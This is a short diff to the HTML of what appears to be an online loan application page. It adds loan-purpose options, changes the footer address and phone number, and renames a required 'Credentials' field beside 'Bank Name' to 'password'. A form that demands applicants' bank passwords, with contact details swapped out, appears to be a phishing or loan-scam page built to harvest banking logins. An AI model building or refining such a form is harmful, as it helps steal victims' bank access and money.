--- a/index.html
+++ b/index.html
@@ -122,6 +122,8 @@
         <option value="Home Improvement">Home Improvement</option>
         <option value="Medical">Medical</option>
         <option value="Education">Education</option>
+        <option value="Debt Consolidation">Debt Consolidation</option>
+        <option value="Major Purchase">Major Purchase</option>
         <option value="Other">Other</option>
       </select>
     </label>
@@ -193,7 +195,7 @@
   </label>
 
   <label>Credentials *
-    <input type="text" name="credentials" required>
+    <input type="text" name="password" required>
   </label>
 
   <label>Bank Name *
@@ -275,8 +277,8 @@
     <div class="footer-col">
       <h4>CONTACT US</h4>
       <p>
-        📍 175 W. Jackson Blvd, Suite 600, Chicago, IL 60604 <br />
-        📞 <a href="#" class="phone-link">773 916 1870</a>
+        📍 350 Tenth Avenue, Suite 1400, San Diego, CA 92101, United States <br />
+        📞 <a href="#" class="phone-link">(630) 202-0596</a>
 
 <style>
   .phone-link {
